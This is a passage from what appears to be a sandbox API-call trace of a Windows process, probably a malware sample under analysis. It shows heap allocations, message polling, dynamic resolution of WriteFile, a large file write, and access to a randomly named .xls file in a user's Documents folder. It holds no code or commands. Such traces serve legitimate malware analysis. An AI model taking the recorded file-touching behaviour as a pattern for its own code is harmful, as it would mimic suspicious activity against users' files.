lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0173.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.990] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.990] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0173.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0173.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.992] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.996] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0173.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9b9a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.997] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.997] WriteFile (in: hFile=0x138, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0xfe17, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0xfe17, lpOverlapped=0x0) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.998] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.999] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.999] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.999] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.999] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.999] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.999] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.999] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.001] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.001] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0174.001] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0174.001] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 